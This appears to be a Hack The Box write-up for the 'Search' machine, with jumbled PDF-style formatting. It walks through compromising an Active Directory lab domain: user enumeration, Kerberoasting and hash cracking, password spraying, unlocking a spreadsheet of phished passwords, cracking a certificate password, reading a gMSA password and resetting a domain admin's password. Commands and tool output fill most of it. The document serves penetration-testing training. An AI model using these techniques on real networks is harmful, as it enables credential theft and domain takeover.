htb-search-nl

Search

Enumeration

┌─[✗]─[puck@parrot-lt]─[~/htb/search]
└──╼ $nmap -Pn -sV --script "ldap* and not brute*" -p 389 10.10.11.129
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-25 15:51 CET
Stats: 0:00:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:51 (0:00:01 remaining)
Stats: 0:01:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:52 (0:00:02 remaining)
Stats: 0:03:32 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.78% done; ETC: 15:54 (0:00:05 remaining)
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] passwords: Time limit 10m00s exceeded.
NSE: [ldap-brute] usernames: Time limit 10m00s exceeded.
Nmap scan report for search.htb0 (10.10.11.129)
Host is up (0.096s latency).

Bug in ldap-brute: no string output.
PORT STATE SERVICE VERSION
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=search,DC=htb
| ldapServiceName: search.htb:research$@SEARCH.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
--snip--
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=search,DC=htb
| serverName: CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=search,DC=htb
| namingContexts: CN=Configuration,DC=search,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=search,DC=htb
| namingContexts: DC=DomainDnsZones,DC=search,DC=htb
| namingContexts: DC=ForestDnsZones,DC=search,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 213347
| dsServiceName: CN=NTDS Settings,CN=RESEARCH,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=search,DC=htb
| dnsHostName: Research.search.htb
| defaultNamingContext: DC=search,DC=htb
| currentTime: 20220125140121.0Z
|_ configurationNamingContext: CN=Configuration,DC=search,DC=htb
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 606.65 seconds
┌─[puck@parrot-lt]─[~/htb/search]
$\> nmap -p- -sV -sC --min-rate 4500 --max-rtt-timeout 1500ms 10.10.11.129 --open
Starting Nmap 7.92 ( https://nmap.org ) at
05:55 GMT
Nmap scan report for search.htb (10.10.11.129)
Host is up (0.15s latency).
Not shown: 65516 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_
Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Search &mdash; Just Testing IIS
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time:
135/tcp open msrpc Microsoft Windows RPC
05:56:16Z)
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
443/tcp
open
2030-08-09T08:13:35
ssl/http
Microsoft IIS httpd 10.0
| tls-alpn:
|_
http/1.1
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
2030-08-09T08:13:35
|_http-title: Search &mdash; Just Testing IIS
| http-methods:
|_
Potentially risky methods: TRACE
445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
3268/tcp
open
2030-08-09T08:13:35
ldap
Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=research
| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
2030-08-09T08:13:35
|_ssl-date: T05:57:46+00:00; +1s from scanner time.
3269/tcp
open
ssl/ldap
Microsoft Windows Active Directory LDAP (Domain: search.htb0.,
Site: Default-First-Site-Name)
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=research| Not valid before: 2020-08-11T08:13:35
|_Not valid after:
8172/tcp
open
2030-08-09T08:13:35
ssl/http
Microsoft IIS httpd 10.0
| ssl-cert: Subject: commonName=WMSvc-SHA2-RESEARCH
| Not valid before: 2020-04-07T09:05:25
|_Not valid after:
2030-04-05T09:05:25
|_ssl-date: T05:57:46+00:00; +2s from scanner time.
|_http-title: Site doesn't have a title.
| tls-alpn:
|_
http/1.1
|_http-server-header: Microsoft-IIS/10.0
9389/tcp
mc-nmf .NET Message Framing
49666/tcp open
open
msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-time:
| date: T05:57:10
|_ start_date: N/A
| smb2-security-mode:
|
|_
3.1.1:
Message signing enabled and required

Nmap reveals a lot of open ports, most of them are Windows based ports. Add the domain to hosts
file. Let’s look into web first.Nothing much available on the web other than team members name. Let’s add these name to a file
and enumerate valid usernames.

$\> ./kerbrute_linux_amd64 userenum users.txt -d search.htb --dc search.htb
__
__
/ /_____
_____/ /_
__
_______
__/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< /
__/ /
/_/|_|\___/_/
/ /_/ / /
/_.___/_/
/ /_/ / /_/
__/
\__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 01/03/22 - Ronnie Flathers @ropnop
2022/01/03 06:08:27 >
2022/01/03 06:08:27 >
Using KDC(s):
search.htb:88
2022/01/03 06:08:27 > [+] VALID USERNAME:
Dax.Santiago@search.htb
2022/01/03 06:08:27 > [+] VALID USERNAME:
Sierra.Frye@search.htb
2022/01/03 06:08:27 > [+] VALID USERNAME:
Keely.Lyons@search.htb
2022/01/03 06:08:27 > Done! Tested 8 usernames (3 valid) in 0.152 seconds

Out of eight users only three are valid. Let’s Try to query the domain for users with ‘Do not require Kerberos pre-authentication’ set and export their TGTs for cracking.

$\> ./GetNPUsers.py search.htb/ -usersfile users.txt
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
[-] User Dax.Santiago doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Keely.Lyons doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sierra.Frye doesn't have UF_DONT_REQUIRE_PREAUTH set

These accounts have not set to ‘Do not require pre-auth’. This means, we can’t perform Kerberoasting attack, it requires a user with Pre-Authentication enabled. We can’t dump LDAP
without a valid password of a user. There’s no any interesting directory’s to look into. However, there’s a image which has interesting information.

If we look at the August 17 date, it says ‘Send password to Hope Sharp’ and password is mentioned IsolationIsKey? We have username and password of Hope user. We can perform password spaying on recently found accounts too.

$\> crackmapexec smb search.htb -u users.txt -p 'IsolationIsKey?' --shares
SMB
10.10.11.129
445
RESEARCH
[*] Windows 10.0 Build 17763 x64
(name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB
10.10.11.129
445 RESEARCH [-] search.htb\Dax.Santiago:IsolationIsKey?
445 RESEARCH [-] search.htb\Keely.Lyons:IsolationIsKey?
445 RESEARCH [-] search.htb\Sierra.Frye:IsolationIsKey?
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE

As you can see, this password is not valid for any of the user which we found recently. Let’s try this password with Hope user.

$\> crackmapexec smb search.htb -u Hope.Sharp -p 'IsolationIsKey?' --shares
SMB
10.10.11.129
445
RESEARCH
[*] Windows 10.0 Build 17763 x64
(name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.129 445 RESEARCH [+] search.htb\Hope.Sharp:IsolationIsKey?
SMB 10.10.11.129 445 RESEARCH [+] Enumerated shares SMB 10.10.11.129 445 RESEARCH Share Permissions Remark
SMB 10.10.11.129 445 RESEARCH ----- ----------- ------
SMB 10.10.11.129 445 RESEARCH ADMIN$ Remote Admin
SMB 10.10.11.129 445 RESEARCH C$ Default
10.10.11.129 445 RESEARCH CertEnroll
share
SMB
READ Active
Directory Certificate Services share
SMB 10.10.11.129 445 RESEARCH helpdesk SMB 10.10.11.129 445 RESEARCH IPC$ READ Remote IPC
SMB 10.10.11.129 445 RESEARCH NETLOGON READ Logon server
10.10.11.129 445 RESEARCH RedirectedFolders$ READ,WRITE
share
SMBSMB
10.10.11.129
445
RESEARCH
SYSVOL
READ
Logon server
share

We have access to couple shared directory’s. Let’s look into them.

$\> smbclient //search.htb/RedirectedFolders$ -U Hope.Sharp
Enter WORKGROUP\Hope.Sharp's password:IsolationIsKey?
Try "help" to get a list of possible commands.
smb: \> ls
. Dc 0 Mon Jan 3 06:23:12 2022
.. Dc 0 Mon Jan 3 06:23:12 2022
abril.suarez Dc 0 Tue Apr 7 18:12:58 2020
Angie.Duffy Dc 0 Fri Jul 31 13:11:32 2020
Antony.Russo Dc 0 Fri Jul 31 12:35:32 2020
belen.compton Dc 0 Tue Apr Cameron.Melendez Dc 0 Fri Jul 31 12:37:36 2020
chanel.bell Dc 0 Tue Apr Claudia.Pugh Dc 0 Fri Jul 31 13:09:08 2020
Cortez.Hickman Dc 0 Fri Jul 31 12:02:04 2020
dax.santiago Dc 0 Tue Apr Eddie.Stevens Dc 0 Fri Jul 31 11:55:34 2020
edgar.jacobs Dc 0 Thu Apr Edith.Walls Dc 0 Fri Jul 31 12:39:50 2020
eve.galvan Dc 0 Tue Apr 7 18:23:13 2020
frederick.cuevas Dc 0 Tue Apr 7 18:29:22 2020
hope.sharp Dc 0 Thu Apr 9 14:34:41 2020
jayla.roberts Dc 0 Tue Apr 7 18:07:00 2020
Jordan.Gregory Dc 0 Fri Jul 31 13:01:06 2020
payton.harmon Dc 0 Thu Apr Reginald.Morton Dc 0 Fri Jul 31 11:44:32 2020
santino.benjamin Dc 0 Tue Apr Savanah.Velazquez Dc 0 Fri Jul 31 12:21:42 2020
sierra.frye Dc 0 Thu Nov 18 01:01:46 2021
trace.ryan Dc 0 Thu Apr
7 18:32:31 2020
7 18:15:09 2020
7 18:20:08 2020
9 20:04:11 2020
9 20:11:39 2020
7 18:10:25 2020
9 20:14:26 2020

More user information is present in this directory. Let’s add these to users.txt file. We can access Hope users directory, but for the rest we don’t have permission to read or list the contents.

Now we have a valid username and password, we can dump LDAP.

$\> bloodhound-python -u Hope.Sharp -p 'IsolationIsKey?' -ns 10.10.11.129 -d search.htb -c All
INFO: Found AD domain: search.htb
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 113 computers
INFO: Connecting to LDAP server: research.search.htb
INFO: Found 106 users
INFO: Found 63 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
----------SNIP----------

We have a vhost, let’s add that to host file. Now we can use this dump to visualize it using bloodhound GUI.

puck@parrot-lt
sudo neo4j console
puck@parrot-lt
bloodhound

 

Upload all the dumped data.

This is the shortest path to domain admin. However, we don’t have access to any of the user who are member of ‘ITSEC’. We have access to ‘Hope Sharp’ user but she’s not a member of ITSEC. However, if we look for Kerberoastable Accounts, then we’d find two.


This ‘Web_svc’ account is created by HelpDesk and it is temporary. It is being used as Web Service, so basically it is a service account.

The SPN is not null, so we can Kerberoast to extract service account credentials (hash) from Active Directory as a regular user without sending any packets to the target system.

https://swarm.ptsecurity.com/kerberoasting-without-spns/

 

$\> GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/Hope.Sharp:IsolationIsKey?
Impacket v0.9.25.dev1+20211027.123255.1dad8f7f - Copyright 2021 SecureAuth Corporation
ServicePrincipalName
Name MemberOf PasswordLastSet LastLogon
------- -------- -------------------------- ---------
2020-04-09 12:59:11.329031 <never>
Delegation
---------------------------------
---
-------
RESEARCH/web_svc.search.htb:60001
web_svc
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$893ce4d4fcc86c204faebe423b7e32e2$688d48c511824

We got the hash of Web_svc service account. Let’s try to crack it.

$\> hashcat -m 13100 web_svc_hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
--------SNIP--------
$krb5tgs$23$*web_svc$SEARCH.HTB$search.htb/web_svc*$e53619cf90ce49f28580953ec9f6ae63$13d69c419359f
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
--------SNIP--------

We got the password for web_svc service account, let’s spray this password across all the
accounts which we have found so far.

$\> crackmapexec smb search.htb -u users.txt -p '@3ONEmillionbaby' --continue-on-success
SMB
10.10.11.129
445
RESEARCH
[*] Windows 10.0 Build 17763 x64
(name:RESEARCH) (domain:search.htb) (signing:True) (SMBv1:False)
SMB
10.10.11.129
445 RESEARCH [-] search.htb\dave.simpson:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Dax.Santiago:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Keely.Lyons:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Sierra.Frye:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Kyla.Stewart:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Chris.Stewart:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\Ben.Thompson:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Kaiara.Spencer:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\abril.suarez:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Angie.Duffy:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Antony.Russo:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\belen.compton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Cameron.Melendez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\chanel.bell:@3ONEmillionbaby
445 RESEARCH [-] search.htb\Claudia.Pugh:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Cortez.Hickman:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\dax.santiago:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\Eddie.Stevens:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB 10.10.11.129 445 RESEARCH [+] search.htb\edgar.jacobs:@3ONEmillionbaby
SMB 10.10.11.129 445 RESEARCH [-] search.htb\Edith.Walls:@3ONEmillionbaby
445 RESEARCH [-] search.htb\eve.galvan:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\frederick.cuevas:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\hope.sharp:@3ONEmillionbaby
445 RESEARCH [-]
STATUS_LOGON_FAILURE
SMB
10.10.11.129
search.htb\jayla.roberts:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Jordan.Gregory:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\payton.harmon:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Reginald.Morton:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445
RESEARCH
[-]
search.htb\santino.benjamin:@3ONEmillionbaby STATUS_LOGON_FAILURESMB
10.10.11.129
445
RESEARCH
[-]
search.htb\Savanah.Velazquez:@3ONEmillionbaby STATUS_LOGON_FAILURE
SMB
10.10.11.129
445 RESEARCH [-] search.htb\sierra.frye:@3ONEmillionbaby
445 RESEARCH [-] search.htb\trace.ryan:@3ONEmillionbaby
STATUS_LOGON_FAILURE
SMB
10.10.11.129
STATUS_LOGON_FAILURE

One user account is using the same password as service account. Let’s look into shares of that user.

$\> smbclient //search.htb/RedirectedFolders$ -U edgar.jacobs
Enter WORKGROUP\edgar.jacobs's password:@3ONEmillionbaby
Try "help" to get a list of possible commands.
smb: \> cd edgar.jacobs\Desktop\
smb: \edgar.jacobs\Desktop\> ls
. DRc 0 .. DRc 0 Mon Aug 10 10:02:16 2020
$RECYCLE.BIN DHSc 0 Thu Apr
desktop.ini AHSc 282 Microsoft Edge.lnk Ac 1450
Phishing_Attempt.xlsx Ac 23130
Mon Aug 10 10:02:16 2020
9 20:05:29 2020
Mon Aug 10 10:02:16 2020
Thu Apr
9 20:05:03 2020
Mon Aug 10 10:35:44 2020
3246079 blocks of size 4096. 458055 blocks available
smb: \edgar.jacobs\Desktop\> get Phishing_Attempt.xlsx

There’s a XLS file, download that to your machine.
This XLS document has two sheets, one of them has captured passwords of phishing and another
has a list of username. As you can see the lock symbol on second sheet, a column is being
locked with a password.You can confirm it by resizing the cell which is in between lastname and Username. There are
two ways to remove the password. Upload it on google drive and access it via sheets, it will
remove the password for you. This is the easiest way. If you want to remove it manually, then
you need unzip this xlsx file and delete the below link from the sheet2.xml file.
<sheetProtection algorithmName=”SHA-512″
hashValue=”hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg”
saltValue=”U9oZfaVCkz5jWdhs9AA8nA” spinCount=”100000″ sheet=”1″ objects=”1″ scenarios=”1″/>
You can find this ‘sheet2.xml’ file after unzipping the xlsx file. Location:
xl/worksheets/sheet2.xml Once you delete that line, you need to zip it back.
$\> zip -r Phishing.xls .
Open the xls file and double click on the line which is between D and B to see the passwords.

firstname lastname password Username
Payton Harmon ;;36!cried!INDIA!year!50;; Payton.Harmon
Cortez Hickman ..10-time-TALK-proud-66.. Cortez.Hickman
Bobby Wolf ??47^before^WORLD^surprise^91?? Bobby.Wolf
Margaret Robinson //51+mountain+DEAR+noise+83// Margaret.Robinson
Scarlett Parks ++47|building|WARSAW|gave|60++ Scarlett.Parks
Eliezer Jordan !!05_goes_SEVEN_offer_83!! Eliezer.Jordan
Hunter Kirby ~~27%when%VILLAGE%full%00~~ Hunter.Kirby
Sierra Frye $$49=wide=STRAIGHT=jordan=28$$18 Sierra.Frye
Annabelle Wells ==95~pass~QUIET~austria~77== Annabelle.Wells
Eve Galvan //61!banker!FANCY!measure!25// Eve.Galvan
Jeramiah Fritz ??40:student:MAYOR:been:66?? Jeramiah.Fritz
Abby Gonzalez &&75:major:RADIO:state:93&& Abby.Gonzalez
Joy Costa **30*venus*BALL*office*42** Joy.Costa
Vincent Sutton **24&moment&BRAZIL&members&66** Vincent.Sutton

Now we have 15 more username & passwords. If we look at the bloodhound visual path to domain
admin, out of all the users, there are only two are in the password list. Abby and Sierra will
lead to domain admin. The Abby password didn’t work, but Sierra’s did.

$\> smbclient //search.htb/RedirectedFolders$ -U Sierra.Frye
Enter WORKGROUP\Sierra.Frye's password: $$49=wide=STRAIGHT=jordan=28$$18
Try "help" to get a list of possible commands.
smb: \> cd sierra.frye\Desktop\
smb: \sierra.frye\Desktop\> ls
. DRc 0 .. DRc 0
Thu Nov 18 01:08:00 2021
Thu Nov 18 01:08:00 2021
$RECYCLE.BIN DHSc 0 Tue Apr
desktop.ini AHSc 282 Microsoft Edge.lnk Ac 1450 user.txt Ac 33
7 18:03:59 2020
Fri Jul 31 14:42:15 2020
Tue Apr
7 12:28:05 2020
Thu Nov 18 00:55:27 2021
3246079 blocks of size 4096. 459005 blocks available
smb: \sierra.frye\Desktop\> get user.txt
getting file \sierra.frye\Desktop\user.txt of size 34 as user.txt (0.1 KiloBytes/sec) (average
0.1 KiloBytes/sec)

We have user flag now.

smb: \sierra.frye\Downloads\Backups\> ls
. DHc 0 Mon Aug 10 20:39:17 2020
.. DHc 0 Mon Aug 10 20:39:17 2020
Ac 2643 Fri Jul 31 15:04:11 2020
search-RESEARCH-CA.p12staff.pfx
Ac
4326
Mon Aug 10 20:39:17 2020
3246079 blocks of size 4096. 458996 blocks available

Under Downloads we will find Cryptography files. Let’s download them to our machine.
A p12 file contains a digital certificate that uses PKCS#12 (Public Key Cryptography
Standard #12) encryption. It is used as a portable format for transferring personal private
keys and other sensitive information. P12 files are used by various security and encryption
programs. It is generally referred to as a “PFX file”.
We can try to upload this certificate to browser (firefox).
It asks for the password. We can try to crack the password using bellow tool.
GitHub – Ridter/p12tool: A simple Go script to brute force or parse a password-protected
PKCS#12 (PFX/P12) file.

$\> ./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
██████╗
██╗██████╗ ████████╗ ██████╗
██████╗ ██╗
██╔══██╗███║╚════██╗╚══██╔══╝██╔═══██╗██╔═══██╗██║
██████╔╝╚██║ █████╔╝ ██║ ██║
██║██║
██║██║
██╔═══╝ ██║██╔═══╝ ██║ ██║
██║██║
██║██║
██║ ██║███████╗ ██║ ╚██████╔╝╚██████╔╝███████╗
╚═╝ ╚═╝╚══════╝ ╚═╝
╚═════╝
╚═════╝ ╚══════╝
Version: 1.0 (n/a) - 01/03/22 - Evi1cg
2022/01/03 02:34:13 -> [*] Brute forcing...
2022/01/03 02:34:13 -> [*] Start thread num 100
2022/01/03 03:01:44 -> [+] Password found ==> misspissy
2022/01/03 03:01:44 -> [*] Successfully cracked password after 5484391 attempts!

If you are on VM then it’d take much more time. Now we have the password for the certificate (misspissy)
Let’s add it in our browser.There’s a specific endpoint which you can access with this certificate.

https://search.htb/staff/

Now we need to input the credentials of ‘Sierra’ user ‘$$49=wide=STRAIGHT=jordan=28$$18’ and access PowerShell Console.

After login we can run Powershell commands.
Let’s go back to bloodhound and look for path from owned principle to domain admin.As we are member of ITSEC, we can read GMSA password.
BIR-ADFS-GMSA@SEARCH.HTB is a Group Managed Service Account. The group ITSEC@SEARCH.HTB can
retrieve the password for the GMSA BIR-ADFS-GMSA@SEARCH.HTB.

$\> python3 gMSADumper.py -d search.htb -u 'Sierra.Frye' -p '$$49=wide=STRAIGHT=jordan=28$$18'
BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

gMSAs use 240-byte, randomly generated complex passwords. So, it’s hard to crack.
PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings
Passwordless PowerShell
GMSA Attributes in the Active Directory
msDS-GroupMSAMembership ( PrincipalsAllowedToRetrieveManagedPassword ) – stores the
security principals that can access the GMSA password.
msds-ManagedPassword – This attribute contains a BLOB with password information for
group-managed service accounts.
msDS-ManagedPasswordId – This constructed attribute contains the key identifier for the
current managed password data for a group MSA.
msDS-ManagedPasswordInterval – This attribute is used to retrieve the number of days
before a managed password is automatically changed for a group MSA.
Based on these both blogs, we can run commands as BIR-ADFS-GMSA to set an environment to access
domain admin
$user = ‘BIR-ADFS-GMSA$’
$gmsa = Get-ADServiceAccount -Identity $user -Properties ‘msDS-ManagedPassword’
$blob = $gmsa.’msDS-ManagedPassword’
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Management.Automation.PSCredential $user,
$mp.SecureCurrentPassword
With these above we are setting up the GMSA password to be used and runas ‘BIR-ADFS-GMSA$’
user.

Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Users\Sierra.Frye\Documents> 
$user = 'BIR-ADFS-GMSA$'
PS C:\Users\Sierra.Frye\Documents> 
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> 
$blob = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> 
$mp = ConvertFrom-ADManagedPasswordBlob $blob
PS C:\Users\Sierra.Frye\Documents> 
$cred = New-Object System.Management.Automation.PSCredential $user, $mp.SecureCurrentPassword
PS C:\Users\Sierra.Frye\Documents> 
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
search\bir-adfs-gmsa$
PS C:\Users\Sierra.Frye\Documents>

 

Everything is set, now we need to invoke commands to run any type of script/command.
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
For that we will use above command to know which user access we have right now.

$user = 'BIR-ADFS-GMSA$'
$gmsa = Get-ADServiceAccount -Identity $user -Properties 'msDS-ManagedPassword'
$blob = $gmsa.'msDS-ManagedPassword'
$mp = ConvertFrom-ADManagedPasswordBlob $blob
$cred = New-Object System.Managment.Automation.PSCredential $user, $mp.SecureCurrentPassword
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

As you can see ‘whoami’ result is showing that we are ‘BIR-ADFS-GMSA$’ user, not ‘Sierra’.
Let’s look into Bloodhound one more time.Let’s look into help of ‘Generic all’.
As you can see ‘Generic All’ privileges simply means full control over ‘Tristan’ user, who is
also a domain admin. Let’s change the domain admin password.

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}

Now we can access admin directory to read the root flag.

$\> smbclient //search.htb/C$ -U Tristan.Davies
Enter WORKGROUP\Tristan.Davies's password:
Try "help" to get a list of possible commands.
smb: \> ls
$RECYCLE.BIN DHSc 0 Mon Mar 23 19:24:13 2020
Config.Msi DHSc 0 Thu Dec 16 17:08:46 2021
DHSrn 0 Sun Mar 22 23:46:47 2020
HelpDesk Dc 0 Tue Apr 14 10:24:23 2020
inetpub Dc 0 Mon Mar 23 07:20:20 2020
Documents and Settings
pagefile.sys
AHS 738197504
PerfLogs
Mon Jan
3 07:18:09 2022
Dc 0 Thu Jul 30 14:43:39 2020
DRc 0 Thu Dec 16 17:07:44 2021
Dc 0 Sat Sep 15 07:21:46 2018
DHcn 0 Tue Apr 14 10:24:03 2020
DHScn 0 Sun Mar 22 23:46:48 2020
Dc 0 Mon Jan
System Volume Information DHS 0 Tue Mar 31 14:13:38 2020
Users DRc 0 Tue Aug 11 07:45:30 2020
Dc 0 Mon Dec 20 08:10:02 2021
Program Files
Program Files (x86)
ProgramData
Recovery
RedirectedFolders
Windows
3 07:55:00 2022
3246079 blocks of size 4096. 534471 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec)
(average 0.1 KiloBytes/sec)

..

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *